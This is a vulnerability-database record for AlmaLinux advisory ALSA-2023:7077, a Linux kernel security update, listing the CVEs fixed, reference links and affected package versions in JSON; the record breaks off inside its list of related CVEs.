Vulnerability-Lookup

alsa-2023:7077

Vulnerability from osv_almalinux

Published

2023-11-14 00:00

Modified

2023-11-23 10:20

Summary

Important: kernel security, bug fix, and enhancement update

Details

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

kernel: tun: avoid double free in tun_free_netdev (CVE-2022-4744)
kernel: net/sched: multiple vulnerabilities (CVE-2023-3609, CVE-2023-3611, CVE-2023-4128, CVE-2023-4206, CVE-2023-4207, CVE-2023-4208)
kernel: out-of-bounds write in qfq_change_class function (CVE-2023-31436)
kernel: out-of-bounds write in hw_atl_utils_fw_rpc_wait (CVE-2021-43975)
kernel: Rate limit overflow messages in r8152 in intr_callback (CVE-2022-3594)
kernel: use after free flaw in l2cap_conn_del (CVE-2022-3640)
kernel: double free in usb_8dev_start_xmit (CVE-2022-28388)
kernel: vmwgfx: multiple vulnerabilities (CVE-2022-38457, CVE-2022-40133, CVE-2023-33951, CVE-2023-33952)
hw: Intel: Gather Data Sampling (GDS) side channel vulnerability (CVE-2022-40982)
kernel: Information leak in l2cap_parse_conf_req (CVE-2022-42895)
kernel: KVM: multiple vulnerabilities (CVE-2022-45869, CVE-2023-4155, CVE-2023-30456)
kernel: memory leak in ttusb_dec_exit_dvb (CVE-2022-45887)
kernel: speculative pointer dereference in do_prlimit (CVE-2023-0458)
kernel: use-after-free due to race condition in qdisc_graft (CVE-2023-0590)
kernel: x86/mm: Randomize per-cpu entry area (CVE-2023-0597)
kernel: HID: check empty report_list in hid_validate_values (CVE-2023-1073)
kernel: sctp: fail if no bound addresses can be used for a given scope (CVE-2023-1074)
kernel: hid: Use After Free in asus_remove (CVE-2023-1079)
kernel: use-after-free in drivers/media/rc/ene_ir.c (CVE-2023-1118)
kernel: hash collisions in the IPv6 connection lookup table (CVE-2023-1206)
kernel: ovl: fix use after free in struct ovl_aio_req (CVE-2023-1252)
kernel: denial of service in tipc_conn_close (CVE-2023-1382)
kernel: Use after free bug in btsdio_remove due to race condition (CVE-2023-1989)
kernel: Spectre v2 SMT mitigations problem (CVE-2023-1998)
kernel: ext4: use-after-free in ext4_xattr_set_entry (CVE-2023-2513)
kernel: fbcon: shift-out-of-bounds in fbcon_set_font (CVE-2023-3161)
kernel: out-of-bounds access in relay_file_read (CVE-2023-3268)
kernel: xfrm: NULL pointer dereference in xfrm_update_ae_params (CVE-2023-3772)
kernel: smsusb: use-after-free caused by do_submit_urb (CVE-2023-4132)
kernel: Race between task migrating pages and another task calling exit_mmap (CVE-2023-4732)
Kernel: denial of service in atm_tc_enqueue due to type confusion (CVE-2023-23455)
kernel: mpls: double free on sysctl allocation failure (CVE-2023-26545)
kernel: Denial of service issue in az6027 driver (CVE-2023-28328)
kernel: lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow (CVE-2023-28772)
kernel: blocking operation in dvb_frontend_get_event and wait_event_interruptible (CVE-2023-31084)
kernel: net: qcom/emac: race condition leading to use-after-free in emac_remove (CVE-2023-33203)
kernel: saa7134: race condition leading to use-after-free in saa7134_finidev (CVE-2023-35823)
kernel: dm1105: race condition leading to use-after-free in dm1105_remove.c (CVE-2023-35824)
kernel: r592: race condition leading to use-after-free in r592_remove (CVE-2023-35825)
kernel: net/tls: tls_is_tx_ready() checked list_entry (CVE-2023-1075)
kernel: use-after-free bug in remove function xgene_hwmon_remove (CVE-2023-1855)
kernel: Use after free bug in r592_remove (CVE-2023-3141)
kernel: gfs2: NULL pointer dereference in gfs2_evict_inode (CVE-2023-3212)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the AlmaLinux Release Notes linked from the References section.

References

URL

Type

	https://access.redhat.com/errata/RHSA-2023:7077	ADVISORY
	https://access.redhat.com/security/cve/CVE-2021-43975	REPORT
	https://access.redhat.com/security/cve/CVE-2022-28388	REPORT
	https://access.redhat.com/security/cve/CVE-2022-3594	REPORT
	https://access.redhat.com/security/cve/CVE-2022-3640	REPORT
	https://access.redhat.com/security/cve/CVE-2022-38457	REPORT
	https://access.redhat.com/security/cve/CVE-2022-40133	REPORT
	https://access.redhat.com/security/cve/CVE-2022-40982	REPORT
	https://access.redhat.com/security/cve/CVE-2022-42895	REPORT
	https://access.redhat.com/security/cve/CVE-2022-45869	REPORT
	https://access.redhat.com/security/cve/CVE-2022-45887	REPORT
	https://access.redhat.com/security/cve/CVE-2022-4744	REPORT
	https://access.redhat.com/security/cve/CVE-2023-0458	REPORT
	https://access.redhat.com/security/cve/CVE-2023-0590	REPORT
	https://access.redhat.com/security/cve/CVE-2023-0597	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1073	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1074	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1075	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1079	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1118	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1206	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1252	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1382	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1855	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1989	REPORT
	https://access.redhat.com/security/cve/CVE-2023-1998	REPORT
	https://access.redhat.com/security/cve/CVE-2023-23455	REPORT
	https://access.redhat.com/security/cve/CVE-2023-2513	REPORT
	https://access.redhat.com/security/cve/CVE-2023-26545	REPORT
	https://access.redhat.com/security/cve/CVE-2023-28328	REPORT
	https://access.redhat.com/security/cve/CVE-2023-28772	REPORT
	https://access.redhat.com/security/cve/CVE-2023-30456	REPORT
	https://access.redhat.com/security/cve/CVE-2023-31084	REPORT
	https://access.redhat.com/security/cve/CVE-2023-3141	REPORT
	https://access.redhat.com/security/cve/CVE-2023-31436	REPORT
	https://access.redhat.com/security/cve/CVE-2023-3161	REPORT
	https://access.redhat.com/security/cve/CVE-2023-3212	REPORT
	https://access.redhat.com/security/cve/CVE-2023-3268	REPORT
	https://access.redhat.com/security/cve/CVE-2023-33203	REPORT
	https://access.redhat.com/security/cve/CVE-2023-33951	REPORT
	https://access.redhat.com/security/cve/CVE-2023-33952	REPORT
	https://access.redhat.com/security/cve/CVE-2023-35823	REPORT
	https://access.redhat.com/security/cve/CVE-2023-35824	REPORT
	https://access.redhat.com/security/cve/CVE-2023-35825	REPORT
	https://access.redhat.com/security/cve/CVE-2023-3609	REPORT
	https://access.redhat.com/security/cve/CVE-2023-3611	REPORT
	https://access.redhat.com/security/cve/CVE-2023-3772	REPORT
	https://access.redhat.com/security/cve/CVE-2023-4128	REPORT
	https://access.redhat.com/security/cve/CVE-2023-4132	REPORT
	https://access.redhat.com/security/cve/CVE-2023-4155	REPORT
	https://access.redhat.com/security/cve/CVE-2023-4206	REPORT
	https://access.redhat.com/security/cve/CVE-2023-4207	REPORT
	https://access.redhat.com/security/cve/CVE-2023-4208	REPORT
	https://access.redhat.com/security/cve/CVE-2023-4732	REPORT
	https://bugzilla.redhat.com/2024989	REPORT
	https://bugzilla.redhat.com/2073091	REPORT
	https://bugzilla.redhat.com/2133453	REPORT
	https://bugzilla.redhat.com/2133455	REPORT
	https://bugzilla.redhat.com/2139610	REPORT
	https://bugzilla.redhat.com/2147356	REPORT
	https://bugzilla.redhat.com/2148520	REPORT
	https://bugzilla.redhat.com/2149024	REPORT
	https://bugzilla.redhat.com/2151317	REPORT
	https://bugzilla.redhat.com/2156322	REPORT
	https://bugzilla.redhat.com/2165741	REPORT
	https://bugzilla.redhat.com/2165926	REPORT
	https://bugzilla.redhat.com/2168332	REPORT
	https://bugzilla.redhat.com/2173403	REPORT
	https://bugzilla.redhat.com/2173430	REPORT
	https://bugzilla.redhat.com/2173434	REPORT
	https://bugzilla.redhat.com/2173444	REPORT
	https://bugzilla.redhat.com/2174400	REPORT
	https://bugzilla.redhat.com/2175903	REPORT
	https://bugzilla.redhat.com/2176140	REPORT
	https://bugzilla.redhat.com/2177371	REPORT
	https://bugzilla.redhat.com/2177389	REPORT
	https://bugzilla.redhat.com/2181330	REPORT
	https://bugzilla.redhat.com/2182443	REPORT
	https://bugzilla.redhat.com/2184578	REPORT
	https://bugzilla.redhat.com/2185945	REPORT
	https://bugzilla.redhat.com/2187257	REPORT
	https://bugzilla.redhat.com/2188468	REPORT
	https://bugzilla.redhat.com/2192667	REPORT
	https://bugzilla.redhat.com/2192671	REPORT
	https://bugzilla.redhat.com/2193097	REPORT
	https://bugzilla.redhat.com/2193219	REPORT
	https://bugzilla.redhat.com/2213139	REPORT
	https://bugzilla.redhat.com/2213199	REPORT
	https://bugzilla.redhat.com/2213485	REPORT
	https://bugzilla.redhat.com/2213802	REPORT
	https://bugzilla.redhat.com/2214348	REPORT
	https://bugzilla.redhat.com/2215502	REPORT
	https://bugzilla.redhat.com/2215835	REPORT
	https://bugzilla.redhat.com/2215836	REPORT
	https://bugzilla.redhat.com/2215837	REPORT
	https://bugzilla.redhat.com/2218195	REPORT
	https://bugzilla.redhat.com/2218212	REPORT
	https://bugzilla.redhat.com/2218943	REPORT
	https://bugzilla.redhat.com/2221707	REPORT
	https://bugzilla.redhat.com/2223949	REPORT
	https://bugzilla.redhat.com/2225191	REPORT
	https://bugzilla.redhat.com/2225201	REPORT
	https://bugzilla.redhat.com/2225511	REPORT
	https://bugzilla.redhat.com/2236982	REPORT
	https://errata.almalinux.org/8/ALSA-2023-7077.html	ADVISORY

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "bpftool"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-abi-stablelists"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-cross-headers"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-debug"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-debug-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-debug-devel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-debug-modules"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-debug-modules-extra"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-devel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-doc"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-headers"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-modules"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-modules-extra"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-tools"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-tools-libs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-tools-libs-devel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-zfcpdump"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-zfcpdump-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-zfcpdump-devel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-zfcpdump-modules"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "kernel-zfcpdump-modules-extra"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "perf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "AlmaLinux:8",
        "name": "python3-perf"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0-513.5.1.el8_9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "details": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: tun: avoid double free in tun_free_netdev (CVE-2022-4744)\n* kernel: net/sched: multiple vulnerabilities (CVE-2023-3609, CVE-2023-3611, CVE-2023-4128, CVE-2023-4206, CVE-2023-4207, CVE-2023-4208)\n* kernel: out-of-bounds write in qfq_change_class function (CVE-2023-31436)\n* kernel: out-of-bounds write in hw_atl_utils_fw_rpc_wait (CVE-2021-43975)\n* kernel: Rate limit overflow messages in r8152 in intr_callback (CVE-2022-3594)\n* kernel: use after free flaw in l2cap_conn_del (CVE-2022-3640)\n* kernel: double free in usb_8dev_start_xmit (CVE-2022-28388)\n* kernel: vmwgfx: multiple vulnerabilities (CVE-2022-38457, CVE-2022-40133, CVE-2023-33951, CVE-2023-33952)\n* hw: Intel: Gather Data Sampling (GDS) side channel vulnerability (CVE-2022-40982)\n* kernel: Information leak in l2cap_parse_conf_req (CVE-2022-42895)\n* kernel: KVM: multiple vulnerabilities (CVE-2022-45869, CVE-2023-4155, CVE-2023-30456)\n* kernel: memory leak in ttusb_dec_exit_dvb (CVE-2022-45887)\n* kernel: speculative pointer dereference in do_prlimit (CVE-2023-0458)\n* kernel: use-after-free due to race condition in qdisc_graft (CVE-2023-0590)\n* kernel: x86/mm: Randomize per-cpu entry area (CVE-2023-0597)\n* kernel: HID: check empty report_list in hid_validate_values (CVE-2023-1073)\n* kernel: sctp: fail if no bound addresses can be used for a given scope (CVE-2023-1074)\n* kernel: hid: Use After Free in asus_remove (CVE-2023-1079)\n* kernel: use-after-free in drivers/media/rc/ene_ir.c (CVE-2023-1118)\n* kernel: hash collisions in the IPv6 connection lookup table (CVE-2023-1206)\n* kernel: ovl: fix use after free in struct ovl_aio_req (CVE-2023-1252)\n* kernel: denial of service in tipc_conn_close (CVE-2023-1382)\n* kernel: Use after free bug in btsdio_remove due to race condition (CVE-2023-1989)\n* kernel: Spectre v2 SMT mitigations problem (CVE-2023-1998)\n* kernel: ext4: use-after-free in ext4_xattr_set_entry (CVE-2023-2513)\n* kernel: fbcon: shift-out-of-bounds in fbcon_set_font (CVE-2023-3161)\n* kernel: out-of-bounds access in relay_file_read (CVE-2023-3268)\n* kernel: xfrm: NULL pointer dereference in xfrm_update_ae_params (CVE-2023-3772)\n* kernel: smsusb: use-after-free caused by do_submit_urb (CVE-2023-4132)\n* kernel: Race between task migrating pages and another task calling exit_mmap (CVE-2023-4732)\n* Kernel: denial of service in atm_tc_enqueue due to type confusion (CVE-2023-23455)\n* kernel: mpls: double free on sysctl allocation failure (CVE-2023-26545)\n* kernel: Denial of service issue in az6027 driver (CVE-2023-28328)\n* kernel: lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow (CVE-2023-28772)\n* kernel: blocking operation in dvb_frontend_get_event and wait_event_interruptible (CVE-2023-31084)\n* kernel: net: qcom/emac: race condition leading to use-after-free in emac_remove (CVE-2023-33203)\n* kernel: saa7134: race condition leading to use-after-free in saa7134_finidev (CVE-2023-35823)\n* kernel: dm1105: race condition leading to use-after-free in dm1105_remove.c (CVE-2023-35824)\n* kernel: r592: race condition leading to use-after-free in r592_remove (CVE-2023-35825)\n* kernel: net/tls: tls_is_tx_ready() checked list_entry (CVE-2023-1075)\n* kernel: use-after-free bug in remove function xgene_hwmon_remove (CVE-2023-1855)\n* kernel: Use after free bug in r592_remove (CVE-2023-3141)\n* kernel: gfs2: NULL pointer dereference in gfs2_evict_inode (CVE-2023-3212)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the AlmaLinux Release Notes linked from the References section.",
  "id": "ALSA-2023:7077",
  "modified": "2023-11-23T10:20:52Z",
  "published": "2023-11-14T00:00:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://access.redhat.com/errata/RHSA-2023:7077"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2021-43975"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-28388"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-3594"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-3640"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-38457"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-40133"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-40982"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-42895"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-45869"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-45887"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2022-4744"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-0458"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-0590"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-0597"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1073"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1074"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1075"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1079"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1118"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1206"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1252"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1382"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1855"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1989"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-1998"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-23455"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-2513"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-26545"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-28328"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-28772"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-30456"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-31084"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-3141"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-31436"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-3161"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-3212"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-3268"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-33203"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-33951"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-33952"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-35823"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-35824"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-35825"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-3609"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-3611"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-3772"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-4128"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-4132"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-4155"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-4206"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-4207"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-4208"
    },
    {
      "type": "REPORT",
      "url": "https://access.redhat.com/security/cve/CVE-2023-4732"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2024989"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2073091"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2133453"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2133455"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2139610"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2147356"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2148520"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2149024"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2151317"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2156322"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2165741"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2165926"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2168332"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2173403"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2173430"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2173434"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2173444"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2174400"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2175903"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2176140"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2177371"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2177389"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2181330"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2182443"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2184578"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2185945"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2187257"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2188468"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2192667"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2192671"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2193097"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2193219"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2213139"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2213199"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2213485"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2213802"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2214348"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2215502"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2215835"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2215836"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2215837"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2218195"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2218212"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2218943"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2221707"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2223949"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2225191"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2225201"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2225511"
    },
    {
      "type": "REPORT",
      "url": "https://bugzilla.redhat.com/2236982"
    },
    {
      "type": "ADVISORY",
      "url": "https://errata.almalinux.org/8/ALSA-2023-7077.html"
    }
  ],
  "related": [
    "CVE-2022-4744",
